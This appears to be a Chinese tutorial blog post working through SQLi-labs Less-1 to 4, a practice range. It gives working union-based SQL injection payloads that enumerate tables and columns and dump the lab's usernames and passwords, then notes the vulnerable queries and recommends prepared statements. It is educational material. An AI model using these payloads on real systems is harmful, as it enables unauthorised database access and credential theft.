SQL-lab靶场less1-4

说明:部分内容来源于网络,如有侵权联系删除
前情提要:搭建sql-lab本地靶场的时候发现一些致命的报错:

这个程序只能在php 5.x上运行,在php 7及更高版本上,函数"mysql_query"和一些相关函数被删除,而不是"mysqli_query"。某些函数中的"MySQL"被替换为"MySQLi

其中一个原因就是旧版的靶场PHP环境是5.0版本的,而目前小皮面板更新到了8.0版本,配套的PHP环境是7.0。那么解决思路就两种,1:给sql-lab的PHP升级;2:小皮面板改成5.0版本的PHP环境。这里选择第一种解决方案

参考博客:

关于搭建SqliLabs中遇到的问题-CSDN博客

phpstudy v8.1在php7以上版本安装sqli-labs相关配置过程-CSDN博客

数据库结构简单小结:

mysql数据库5.0以上版本有一个自带的数据库叫做information_schema

该数据库下面有两个表一个是tables和columns

tables这个表的table_name字段下面是所有数据库存在的表名

table_schema字段下是所有表名对应的数据库名

columns这个表的colum_name字段下是所有数据库存在的字段名

columns_schema字段下是所有表名对应的数据库

常见语句记忆:

|----------------------------|----------------|
| information_schema | 表示所有信息,包括库、表、列 |
| information_schema.tables | 记录所有表名信息的表 |
| information_schema.columns | 记录所有列名信息的表 |
| table_schema | 数据库的名称 |
| table_name | 表名 |
| column_name | 列名 |
| group_concat() | 显示所有查询到的数据 |

Less-1 **Error Based- String** 基于字符串的报错注入

根据页面显示,提示我们搭配id传一个值

Please input the ID as parameter with numeric value

输入?id=1 回显

输入?id=2时,页面内容改变

说明这个网站应该会通过id参数进行数据库查询,也就是说id只是一个将1传入数据库的"媒介",数据库真正需要处理的是1。

那么数据库能够处理的究竟是字符串1还是整数1,这是一个有待验证的问题。测试:?id=1'

You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''1'' LIMIT 0,1' at line 1

报错警告我们语法有问题

双引号不报错,那就是单引号的存在使原本SQL语句包裹id=1的单引号没有闭合,破坏了查询语句结构。还知道了一点:错误出现在第1行的末尾,即在"1"LIMIT 0,1'附近。相当于提示我们原有的SQL语句的组成,可以推测一下:

SELECT * FROM users WHERE () LIMIT 0,1;

WHERE子句:WHERE子句用于过滤记录,必须在其后面提供一个条件表达式。例如,WHERE id = 1。

LIMIT子句:LIMIT 1表示只返回结果集中的第一行数据。

使用注释符,测试:?id=1' --+ 。没有发生报错,正是因为注释了后面的LIMIT 0,1;

知道了基本注入方式,就可以通过其他操作符得到我想要的信息了

1,order by查询当前数据表有多少列 ?id=1 ' order by 1,2,3 --+

正常回显没有报错

2,增加猜测列数:?id=1 'order by 1,2,3,4 --+

Unknown column '4' in 'order clause'

发生报错,第4列不存在,但是第3列能正常回显,说明数据表有三列

接下来就需要判断回显点(回显点是指SQL查询结果显示在页面上的位置,有回显点的SQL注入叫做回显点注入。通过回显点,攻击者可以观察到SQL查询的结果,从而推断出数据库的结构和内容),而很明显该靶场存在两个回显点。那么还要分别表格哪一列在页面显示的

?id=-1'union select 1,2,3--+

  1. ?id=-1:这部分看起来像是试图将一个查询参数设置为 -1,这通常是SQL注入攻击中的一种常见技巧,用于绕过原始查询的条件。
  2. 'union select 1,2,3--+:这部分是典型的联合查询语法。union 关键字用于合并两个或多个 SELECT 语句的结果集。select 1,2,3 是一个简单的示例查询,它选择常数列 1, 2, 和 3

语句要求回显1,2,3列,结果回显了2,3。说明第二列和第三列的数据是回显点。

通过函数查询数据库名和版本号:

?id=-1'union select 1,database(),version()--+

通过group_concat()函数爆出表名

GROUP_CONCAT() 是 MySQL 中的一个聚合函数,用于将分组中的字符串值连接成一个单一的字符串

GROUP_CONCAT([DISTINCT] expr [ORDER BY {unsigned_integer | col_name | expr} [ASC | DESC] [, ...]] [SEPARATOR str_val])

  • DISTINCT:可选参数,用于去除结果中的重复值。
  • expr:要连接的列或表达式。
  • ORDER BY:可选参数,用于指定连接顺序。
  • SEPARATOR:可选参数,用于指定连接字符串之间的分隔符,默认为逗号 ,

?id=-1'union select 1,2,group_concat(table_name) from information_schema.tables where table_schema='security'--+

  • group_concat(table_name) 将查询到的 information_schema.tables 表中的 table_name 字段的值进行连接。这里的 information_schema 是MySQL自带的信息数据库,其中的 tables 表存储了数据库的库名以及各个数据库中的表名
  • 整个语句将筛选出名为 security 的数据库中的所有表名

结果:emails,referers,uagents,users

爆破字段名:

?id=-1'union select 1,2,group_concat(column_name) from information_schema.columns where table_name='users'--+

  • information_schema.columns 表,这个表存储了数据库中各个表的列信息

爆破结果:CURRENT_CONNECTIONS,TOTAL_CONNECTIONS,id,username,password

可以看到成功爆出来username,password字段

爆破出username,password的数据:

?id=-1' union select 1,group_concat(username),group_concat(password) from users--+

**name:**Dumb,Angelina,Dummy,secure,stupid,superman,batman,admin,admin1,admin2,admin3,dhakkan,admin4

**Password:**Dumb,I-kill-you,p@ssword,crappy,stupidity,genious,mob!le,admin,admin1,admin2,admin3,dumbo,admin4

源码:SELECT * FROM users WHERE id='$id' LIMIT 0,1

Less-2 **Error Based- Intiger** 基于整数的报错注入

1,还是搭配id传一个值

由此确定页面正常回显的的标志,再判断整数还是字符串型注入:?id=1'

看到报错,再加双引号测试:?id=1"

仍然报错,说明原本的查询语句没有单双引号闭合,处理参数1数值类型是整数,是整数型注入

2,order by操作符判断数据表有几列:?id=1 order by 1,2,3 --+

?id=1 order by 1,2,3,4 --+

可以判断出该时间表有3列

3,接下来通过union判断回显点,?id=-1 union select 1,2,3 --+

由此得知回显点仅存在于查询的第2,3列上

4,使用操作符和函数爆出数据库名:

?id=-1 union select 1,2,database()--+

数据库名:security,group_concat()函数security所有数据表名:

?id=-1 union select 1,2,group_concat(table_name) from information_schema.tables where table_schema=database()--+

爆出users数据表所有的列名:

?id=-1 union select 1,2,group_concat(column_name) from information_schema.columns where table_name='users' and table_schema=database()--+

最后就可以输出username,password信息了:

?id=-1 union select 1,group_concat(username),group_concat(password) from users--+

YourLogin :name:Dumb,Angelina,Dummy,secure,stupid,superman,batman,admin,admin1,admin2,admin3,dhakkan,admin4

Your Password:Dumb,I-kill-you,p@ssword,crappy,stupidity,genious,mob!le,admin,admin1,admin2,admin3,dumbo,admin4

源码分析:SELECT * FROM users WHERE id=$id LIMIT 0,1

  • 构造了一个SQL查询语句SELECT * FROM users WHERE id=$id LIMIT 0,1;,用于从users表中根据id查询一条记录。
  • 使用mysqli_query执行查询,并将结果存储在$result中

查询语句和less1其实差不多,少了单引号对id的闭合包裹

WHERE id=-1: 这是一个条件子句,指定了只有当ID列的值等于-1时,对应的记录才会被选中。原数据表根本没有id=-1的序列,所以后续攻击语句都是?id=-1作为开头

SQL中的ID概念

在SQL(Structured Query Language)中,ID通常指的是数据库表中的一个特殊类型的列,用于唯一标识表中的每一行记录。这种列也被称为主键(Primary Key)。主键的主要目的是确保表中的每一行都可以被唯一地识别和访问。在设计数据库时,选择一个合适的ID字段对于数据的管理和检索至关重要3

ID的特性

ID字段通常具有以下特性:

  1. 唯一性:每个ID值必须是唯一的,以确保每行记录都能被准确无误地找到。
  2. 不可变性:一旦分配给某一行,ID值不应该改变,因为这可能会导致与其他依赖于该ID的数据库操作产生冲突。
  3. 顺序性:虽然不是必需的,但在某些情况下,ID值可能是按某种顺序(如递增)分配的,这有助于维护数据的时间顺序或逻辑顺序。

ID的常见用途

ID字段在数据库操作中有着广泛的应用,包括但不限于:

  • 关联数据:通过ID,可以在不同的表之间建立关系,实现数据的关联查询。例如,一个订单表可能有一个产品ID字段,用于关联到产品表中的具体产品记录。
  • 数据检索:可以通过ID快速定位和检索特定的记录。例如,SELECT * FROM users WHERE id = 1 这样的SQL语句可以用来获取ID为1的用户信息。
  • 更新和删除:ID也是更新或删除特定记录时的关键依据。例如,DELETE FROM users WHERE id = 1 可以用来删除ID为1的用户记录。

自动增长ID

在许多现代数据库系统中,支持为ID字段设置自动增长属性。这意味着每当新记录插入到表中时,数据库会自动为该记录分配一个新的、唯一的ID值。这通常通过数据库内部的计数器机制实现。例如,在MySQL中,可以使用AUTO_INCREMENT关键字来定义自动增长的ID字段6

Less-3 Error Based- String (with Twist)基于字符串的报错注入(转义)

1,第一步还是判断什么类型的注入:?id=1

能够正常回显,再测试:?id=1' 产生报错

You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''1'') LIMIT 0,1' at line 1

再测试:?id=1" 能够正常回显。说明单引号会破坏查询语句原有单引号的闭合结构,可以断定这是一个字符型注入

2,order by判断当前数据表的列数:?id=1') order by 1,2,3--+

You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'order by 1,2,3-- ') LIMIT 0,1' at line 1

还是发生了报错,通过报错信息我们知道了真正的闭合方式是')。修改payload:

?id=1') order by 1,2,3--+ 正常回显

依次递归判断:?id=1') order by 1,2,3,4--+

报错说不存在第4列,那么数据表就只有3列

3,union操作符判断注入点:?id=-1') union select 1,2,3--+

回显还是2,3列

4,爆破数据库名:?id=-1') union select 1,2,database()--+

Your Password:security

配合group_concat()函数爆破出当前数据库所有数据表名:

?id=-1') union select 1,2,group_concat(table_name) from information_schema.tables where table_schema =database()--+

查看users数据表里面的所有列名:

?id=-1') union select 1,2,group_concat(column_name) from information_schema.columns where table_name='users' and table_schema=database()--+

最后再爆出用户名和密码:

?id=-1') union select 1,group_concat(username),group_concat(password) from users--+

Your Login name:Dumb,Angelina,Dummy,secure,stupid,superman,batman,admin,admin1,admin2,admin3,dhakkan,admin4

Your Password:Dumb,I-kill-you,p@ssword,crappy,stupidity,genious,mob!le,admin,admin1,admin2,admin3,dumbo,admin4

源码分析:SELECT * FROM users WHERE id=('$id') LIMIT 0,1

其实和less1的查询语句是一样的,只不过多了括号闭合

Less-4 Error Based- DoubleQuotes String

基于双引号的报错注入

1,id传一个值判断注入类型:?id=1'

正常回显页面,再拼接双引号传入一个值:?id=1"

You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '"1"") LIMIT 0,1' at line 1

发生报错,说明双引号会破坏原有查询语句的结构,由此判断注入类型是双引号,而参数又需要使用引号包裹,所以是字符串类型。还有一点,根据报错提示,推断正确的闭合方式应该是:("")

2,order by判断有该数据表有多少列,先猜测三列

?id=1") order by 1,2,3--+

回显是正常的,证明至少有三列,再判断是否有四列:?id=1") order by 1,2,3,4--+

发生报错,推断数据表只有3列

3,union判断回显点:?id=-1") union select 1,2,3--+

只会回显点是2,3列

4,爆破数据库名:?id=-1") union select 1,2,database()--+

爆破出数据表名:?id=-1") union select 1,2,group_concat(table_name) from information_schema.tables where table_schema=database()--+

爆破users表所有列名:?id=1") union select 1,2,group_concat(column_name) from information_schema.columns where table_name='users' and

table_schema=database()--+

再爆破出所有的用户名和密码:?id=-1") union select 1,group_concat(username),group_concat(password) from users--+

Your Login name:Dumb,Angelina,Dummy,secure,stupid,superman,batman,admin,admin1,admin2,admin3,dhakkan,admin4

Your Password:Dumb,I-kill-you,p@ssword,crappy,stupidity,genious,mob!le,admin,admin1,admin2,admin3,dumbo,admin4

select * from user where id=1 union select 1,2,group_concat(column_name) from information_schema.columns where table_name='users' and table_schema=database()--+

select * from user where id=-1 union select 1,2,group_concat(column_name) from information_schema.columns where table_name='users' and table_schema=database()--+

输出结果的区别

**查询目的:**这两个SQL查询的目的是利用SQL注入技术来获取数据库中users表的列名信息。

**查询结构:**两个查询都使用了UNION操作符来合并两个SELECT语句的结果集。第一个查询的条件是id=1,而第二个查询的条件是id=-1。

输出结果的区别

  1. 第一个查询 (id=1):
    • 如果user表中存在id=1的记录,那么查询会首先返回该记录。
    • 然后,UNION操作符会将第二个SELECT语句的结果(即从information_schema.columns 表中获取的列名信息)追加到结果集中。
    • 最终输出结果将包含user表中id=1的记录以及users表的列名信息。
  2. 第二个查询 (id=-1):
    • 由于user表中通常不会有id=-1的记录,第一个SELECT语句将不会返回任何记录。
    • 因此,UNION操作符的结果将仅包含第二个SELECT语句的结果,即users表的列名信息。
    • 最终输出结果将只包含users表的列名信息。

分析源码:

id****=****'"'****.****id**.'"';**

这行代码的作用是将 id 变量的值用双引号包裹起来。例如,如果 id 的值是 123,那么执行这行代码后,$id 的值将变为 "123"

" SELECT * FROM users WHERE id=( $id ) LIMIT 0 , 1 ";

本质上less1,2,3,4的查询语句是一样的,无非是对传入参数的闭合拼接方式不同

改进建议:

  1. 使用预处理语句: 为了防止SQL注入,建议使用预处理语句(Prepared Statements)。例如:
    stmt = pdo->prepare('SELECT * FROM users WHERE id = ? LIMIT 0,1');
    stmt-\>execute(\[id]);
  2. 简化字符串操作: 如果确实需要将 id 用双引号包裹起来,可以考虑在SQL查询中直接使用双引号,而不是在PHP代码中进行字符串拼接。例如: sql = "SELECT * FROM users WHERE id=\"$id\" LIMIT 0,1";
相关推荐
球求了30 分钟前
C++:继承机制详解
开发语言·c++·学习
时光追逐者1 小时前
MongoDB从入门到实战之MongoDB快速入门(附带学习路线图)
数据库·学习·mongodb
一弓虽1 小时前
SpringBoot 学习
java·spring boot·后端·学习
我的golang之路果然有问题3 小时前
速成GO访问sql,个人笔记
经验分享·笔记·后端·sql·golang·go·database
genggeng不会代码3 小时前
用于协同显著目标检测的小组协作学习 2021 GCoNet(总结)
学习
星哥说事3 小时前
使用开源免费雷池WAF防火墙,接入保护你的网站
web安全·开源
浩浩测试一下3 小时前
计算机网络中的DHCP是什么呀? 详情解答
android·网络·计算机网络·安全·web安全·网络安全·安全架构
搞机小能手3 小时前
六个能够白嫖学习资料的网站
笔记·学习·分类
蚁景网络安全4 小时前
从字节码开始到ASM的gadgetinspector源码解析
网络安全
秃头佛爷4 小时前
常用SQL整理
数据库·sql